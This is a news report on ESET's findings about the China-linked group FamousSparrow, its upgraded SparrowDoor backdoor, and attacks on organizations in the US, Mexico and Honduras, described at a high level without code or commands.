A China-linked cyberespionage group known as FamousSparrow has been identified using an upgraded version of its backdoor malware, SparrowDoor, in attacks against a United States-based trade organization, according to security researchers at ESET. This new activity marks a significant increase in the group’s operations since their methods were scrutinized in 2022.
The recent attacks also targeted a Mexican research institute and a government institution in Honduras, with ESET finding that initial access to the networks was gained through the exploitation of outdated Microsoft Exchange and Windows Server endpoints. In these incidents, the attackers deployed webshells to facilitate further infiltration.
Analysis by ESET determined that two new versions of the SparrowDoor backdoor have been deployed, showcasing improvements in code quality and architecture. Notably, these upgrades include enhanced configuration encryption, persistence mechanisms, and a significant feature allowing parallel command execution. This capability enables the malware to process multiple commands simultaneously, thus increasing its operational efficiency and evasion tactics.
Furthermore, the latest version of SparrowDoor features a modular design, allowing it to load plugins from command-and-control (C2) servers at runtime. These plugins expand the malware’s capabilities, enabling functionalities such as keylogging, proxying, file transfer, and process manipulation. Security experts suggest that FamousSparrow’s connection to the ShadowPad remote access trojan (RAT) indicates that they now have access to advanced cyber tools typically associated with state-sponsored Chinese actors.
Consequently, this has raised concerns about the potential risk posed by FamousSparrow and similar groups, as Microsoft has classified them within a broader threat cluster, referred to as Salt Typhoon. The evidence suggests a shared infrastructure among these groups, indicating a possible digital supply chain that facilitates cyberattacks targeting various sectors globally.